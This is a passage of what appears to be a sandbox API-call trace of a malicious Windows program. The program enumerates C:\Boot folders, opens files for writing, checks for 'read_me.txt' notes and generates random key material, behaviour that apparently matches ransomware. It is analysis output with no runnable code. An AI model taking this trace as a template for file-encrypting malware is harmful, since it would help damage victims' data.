ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x8bc7dbfe, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x76980, dwReserved0=0x0, dwReserved1=0x75740000, cFileName="memtest.exe", cAlternateFileName="")) returned 1 [0074.877] wnsprintfW (in: pszDest=0x8b00088, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\memtest.exe") returned 23 [0074.877] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\memtest.exe" (normalized: "c:\\boot\\memtest.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0074.878] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x75740000, cFileName="nb-NO", cAlternateFileName="")) returned 1 [0074.878] wnsprintfW (in: pszDest=0x8b00088, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nb-NO") returned 17 [0074.878] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x75740000, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0074.878] wnsprintfW (in: pszDest=0x8b00088, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nl-NL") returned 17 [0074.878] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x75740000, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0074.878] wnsprintfW (in: pszDest=0x8b00088, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pl-PL") returned 17 [0074.878] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x75740000, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0074.878] wnsprintfW (in: pszDest=0x8b00088, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-BR") returned 17 [0074.878] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x75740000, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0074.878] wnsprintfW (in: pszDest=0x8b00088, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-PT") returned 17 [0074.878] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x75740000, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0074.878] wnsprintfW (in: pszDest=0x8b00088, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ru-RU") returned 17 [0074.878] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x75740000, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0074.878] wnsprintfW (in: pszDest=0x8b00088, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\sv-SE") returned 17 [0074.878] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x75740000, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0074.878] wnsprintfW (in: pszDest=0x8b00088, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\tr-TR") returned 17 [0074.878] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x75740000, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0074.878] wnsprintfW (in: pszDest=0x8b00088, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-CN") returned 17 [0074.878] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x75740000, cFileName="zh-HK", cAlternateFileName="")) returned 1 [0074.878] wnsprintfW (in: pszDest=0x8b00088, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-HK") returned 17 [0074.878] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x75740000, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0074.878] wnsprintfW (in: pszDest=0x8b00088, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-TW") returned 17 [0074.878] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x75740000, cFileName="zh-TW", cAlternateFileName="")) returned 0 [0074.878] FindClose (in: hFindFile=0x7cfe968 | out: hFindFile=0x7cfe968) returned 1 [0074.878] wnsprintfW (in: pszDest=0x8b00088, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\read_me.txt") returned 23 [0074.879] GetProcessHeap () returned 0x4f10000 [0074.879] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b00088 | out: hHeap=0x4f10000) returned 1 [0074.879] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 0 [0074.879] GetProcessHeap () returned 0x4f10000 [0074.879] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ab0060 | out: hHeap=0x4f10000) returned 1 [0074.879] GetProcessHeap () returned 0x4f10000 [0074.879] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ab0060 [0074.879] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\cs-CZ\\*") returned 19 [0074.879] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\cs-CZ\\*", lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x24313260, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24313260, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x75740000, cFileName=".", cAlternateFileName="")) returned 0x7cfe928 [0074.889] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\cs-CZ\\.") returned 19 [0074.889] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x24313260, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24313260, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x75740000, cFileName="..", cAlternateFileName="")) returned 1 [0074.889] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\cs-CZ\\..") returned 20 [0074.889] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0x0, dwReserved1=0x75740000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0074.889] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 33 [0074.889] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0074.889] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24313260, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x24313260, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24313260, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x0, dwReserved1=0x75740000, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0074.889] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\cs-CZ\\read_me.txt") returned 29 [0074.889] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\cs-CZ\\read_me.txt" (normalized: "c:\\boot\\cs-cz\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a0 [0074.889] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0074.889] CloseHandle (hObject=0x7a0) returned 1 [0074.889] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24313260, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x24313260, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24313260, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x0, dwReserved1=0x75740000, cFileName="read_me.txt", cAlternateFileName="")) returned 0 [0074.889] FindClose (in: hFindFile=0x7cfe928 | out: hFindFile=0x7cfe928) returned 1 [0074.890] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\cs-CZ\\read_me.txt") returned 29 [0074.890] GetProcessHeap () returned 0x4f10000 [0074.890] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ab0060 | out: hHeap=0x4f10000) returned 1 [0074.890] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 2 [0074.890] GetProcessHeap () returned 0x4f10000 [0074.890] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ad0070 | out: hHeap=0x4f10000) returned 1 [0074.890] SetFilePointerEx (in: hFile=0x7a4, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.890] ReadFile (in: hFile=0x7a4, lpBuffer=0x728fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x728fd08, lpOverlapped=0x0 | out: lpBuffer=0x728fd4c*, lpNumberOfBytesRead=0x728fd08*=0x0, lpOverlapped=0x0) returned 1 [0074.890] SetFilePointerEx (in: hFile=0x7a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.890] GetProcessHeap () returned 0x4f10000 [0074.890] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0074.890] GetProcessHeap () returned 0x4f10000 [0074.890] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d560a0 [0074.890] SystemFunction036 (in: RandomBuffer=0x7d560a0, RandomBufferLength=0x20 | out: RandomBuffer=0x7d560a0) returned 1 [0074.890] GetProcessHeap () returned 0x4f10000 [0074.890] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x7d738a0 [0074.890] ReadFile (in: hFile=0x7a4, lpBuffer=0x7d738a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x728fd08, lpOverlapped=0x0 | out: lpBuffer=0x7d738a0*, lpNumberOfBytesRead=0x728fd08*=0x0, lpOverlapped=0x0) returned 1 [0074.890] GetProcessHeap () returned 0x4f10000 [0074.890] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0074.890] GetProcessHeap () returned 0x4f10000 [0074.890] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0074.890] GetProcessHeap () returned 0x4f10000 [0074.890] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0074.890] GetProcessHeap () returned 0x4f10000 [0074.890] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0074.890] GetProcessHeap () returned 0x4f10000 [0074.890] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56870 [0074.891] GetProcessHeap () returned 0x4f10000 [0074.891] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0074.891] GetProcessHeap () returned 0x4f10000 [0074.891] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0074.891] GetProcessHeap () returned 0x4f10000 [0074.891] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0074.891] GetProcessHeap () returned 0x4f10000 [0074.891] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0074.891] GetProcessHeap () returned 0x4f10000 [0074.891] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0074.891] GetProcessHeap () returned 0x4f10000 [0074.891] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0074.891] GetProcessHeap () returned 0x4f10000 [0074.891] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0074.891] GetProcessHeap () returned 0x4f10000 [0074.891] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0074.891] GetProcessHeap () returned 0x4f10000 [0074.891] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0074.891] GetProcessHeap () returned 0x4f10000 [0074.891] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0074.891] GetProcessHeap () returned 0x4f10000 [0074.891] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0074.891] GetProcessHeap () returned 0x4f10000 [0074.891] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0074.891] GetProcessHeap () returned 0x4f10000 [0074.891] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0074.891] GetProcessHeap () returned 0x4f10000 [0074.891] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0074.891] GetProcessHeap () returned 0x4f10000 [0074.891] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0074.891] GetProcessHeap () returned 0x4f10000 [0074.891] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0074.891] GetProcessHeap () returned 0x4f10000 [0074.891] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0074.891] GetProcessHeap () returned 0x4f10000 [0074.891] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0074.891] GetProcessHeap () returned 0x4f10000 [0074.891] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0074.891] GetProcessHeap () returned 0x4f10000 [0074.892] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0074.892] GetProcessHeap () returned 0x4f10000 [0074.892] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0074.892] GetProcessHeap () returned 0x4f10000 [0074.892] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0074.892] GetProcessHeap () returned 0x4f10000 [0074.892] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0074.892] GetProcessHeap () returned 0x4f10000 [0074.892] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0074.892] GetProcessHeap () returned 0x4f10000 [0074.892] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0074.892] GetProcessHeap () returned 0x4f10000 [0074.892] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0074.892] GetProcessHeap () returned 0x4f10000 [0074.892] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0074.892] GetProcessHeap () returned 0x4f10000 [0074.892] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0074.892] GetProcessHeap () returned 0x4f10000 [0074.892] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0074.892] GetProcessHeap () returned 0x4f10000 [0074.892] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0074.892] GetProcessHeap () returned 0x4f10000 [0074.892] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0074.892] GetProcessHeap () returned 0x4f10000 [0074.892] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0074.892] GetProcessHeap () returned 0x4f10000 [0074.892] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0074.892] GetProcessHeap () returned 0x4f10000 [0074.892] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bbc8 [0074.892] GetProcessHeap () returned 0x4f10000 [0074.893] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0074.893] GetProcessHeap () returned 0x4f10000 [0074.893] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0074.893] GetProcessHeap () returned 0x4f10000 [0074.893] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bbc8 | out: hHeap=0x4f10000) returned 1 [0074.893] GetProcessHeap () returned 0x4f10000 [0074.893] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0074.893] GetProcessHeap () returned 0x4f10000 [0074.893] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0074.893] GetProcessHeap () returned 0x4f10000 [0074.893] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0074.893] GetProcessHeap () returned 0x4f10000 [0074.893] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0074.893] GetProcessHeap () returned 0x4f10000 [0074.893] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7cf6bf8 [0074.893] GetProcessHeap () returned 0x4f10000 [0074.893] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0074.893] GetProcessHeap () returned 0x4f10000 [0074.893] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d8f0d0 [0074.893] GetProcessHeap () returned 0x4f10000 [0074.893] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0074.893] GetProcessHeap () returned 0x4f10000 [0074.893] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7cf6bf8 [0074.894] GetProcessHeap () returned 0x4f10000 [0074.894] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d8f0d0 | out: hHeap=0x4f10000) returned 1 [0074.894] GetProcessHeap () returned 0x4f10000 [0074.894] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d8f0d0 [0074.894] GetProcessHeap () returned 0x4f10000 [0074.894] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0074.894] GetProcessHeap () returned 0x4f10000 [0074.894] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7cf6bf8 [0074.894] GetProcessHeap () returned 0x4f10000 [0074.894] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d8f0d0 | out: hHeap=0x4f10000) returned 1 [0074.894] GetProcessHeap () returned 0x4f10000 [0074.894] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d8f0d0 [0074.894] GetProcessHeap () returned 0x4f10000 [0074.894] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0074.894] GetProcessHeap () returned 0x4f10000 [0074.894] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7cf6bf8 [0074.894] GetProcessHeap () returned 0x4f10000 [0074.894] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d8f0d0 | out: hHeap=0x4f10000) returned 1 [0074.894] GetProcessHeap () returned 0x4f10000 [0074.894] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d8f0d0 [0074.894] GetProcessHeap () returned 0x4f10000 [0074.894] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0074.894] GetProcessHeap () returned 0x4f10000 [0074.894] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7cf6bf8 [0074.894] GetProcessHeap () returned 0x4f10000 [0074.894] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d8f0d0 | out: hHeap=0x4f10000) returned 1 [0074.894] GetProcessHeap () returned 0x4f10000 [0074.894] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d8f0d0 [0074.894] GetProcessHeap () 